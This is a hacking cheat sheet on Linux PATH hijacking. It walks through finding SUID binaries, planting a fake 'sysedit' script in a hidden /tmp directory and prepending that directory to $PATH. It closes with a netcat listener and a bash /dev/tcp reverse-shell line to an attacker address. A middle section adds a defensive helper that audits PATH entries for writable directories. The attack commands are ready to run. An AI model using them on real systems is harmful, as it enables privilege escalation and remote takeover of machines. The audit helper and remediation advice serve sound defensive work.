Cheat Sheet Hacking

Writable $PATH

Path Hijacking

Identify the SUID file

find / -perm -4000 2>/dev/null   # list SUID binaries system-wide, hiding permission errors

For example, we found a file called /usr/bin/sysedit, and this binary is invoked by its bare name (sysedit, without an absolute path) from a task or script that we control or can execute.

Create a file with malicious content

We need to create a file with the same name as the SUID binary previously found:

mkdir /tmp/.my-things
cd !$                                     # !$ expands to the last argument of the previous command
echo "#!/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit
chmod +x sysedit                          # PATH lookup only considers executable files

Update the $PATH variable

echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/tmp/.my-things:$PATH
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

With that, our folder (with the fake sysedit inside) becomes the first directory searched when sysedit is invoked by bare name, so our file runs instead of /usr/bin/sysedit. This only works if the task inherits the PATH we just modified (for example, a script we launch from this shell); jobs started by cron, systemd, or sudo with secure_path use their own PATH and are not affected.

Now run the task or service that calls that file again. Instead of the normal execution, our script runs and we see:

ls /tmp/.my-things
# id.txt
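As an added example (not part of the original cheat sheet), a small POSIX shell helper that shows the lookup the calling script performs for a bare command name and audits a PATH value for entries a local user could abuse; the sysedit and /tmp/.my-things names are taken from the scenario above, everything else is constructed.

```shell
#!/bin/bash
# Added example, not from the original cheat sheet. Two helpers:
#  - resolve_in_path NAME PATHVALUE: which file a bare command name resolves
#    to under a given PATH (first executable regular file, left to right),
#    i.e. what a script sees when it runs "sysedit" instead of /usr/bin/sysedit.
#  - risky_path_entries PATHVALUE: PATH entries a local user could plant a
#    look-alike binary in (empty/".", relative, missing, or writable entries).
# Remediation for script owners: set PATH explicitly at the top of any
# privileged script and call binaries by absolute path.

resolve_in_path() {
    printf '%s\n' "$2" | tr ':' '\n' | while IFS= read -r dir; do
        [ -z "$dir" ] && dir="."          # an empty PATH entry means the current directory
        if [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
            echo "$dir/$1"
            break
        fi
    done
}

risky_path_entries() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r entry; do
        if [ -z "$entry" ] || [ "$entry" = "." ]; then
            echo "<empty-or-dot>: current directory is searched"
        elif [ "${entry#/}" = "$entry" ]; then
            echo "$entry: relative entry"
        elif [ ! -d "$entry" ]; then
            echo "$entry: missing directory"
        elif [ "$(ls -ldL "$entry" | cut -c9)" = "w" ]; then   # 9th char = other-write bit
            echo "$entry: world-writable"
        elif [ -w "$entry" ]; then
            echo "$entry: writable by $(id -un)"
        fi
    done
}

# Usage in the scenario above (hijacked PATH first, then the fixed PATH a hardened script would set):
#   resolve_in_path sysedit "/tmp/.my-things:$PATH"
#   resolve_in_path sysedit "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin"
#   risky_path_entries "$PATH"
```

Running risky_path_entries against the PATH of every privileged cron job or wrapper script is a quick way to spot the precondition this technique needs.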

If we want a Reverse Shell

On the attacking machine, listen on a port (here 4460):

nc -lnvp 4460

Now write the fake sysedit so that it connects back to the listener (10.10.10.10 is the attacker's address):

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit

Last updated 5 months ago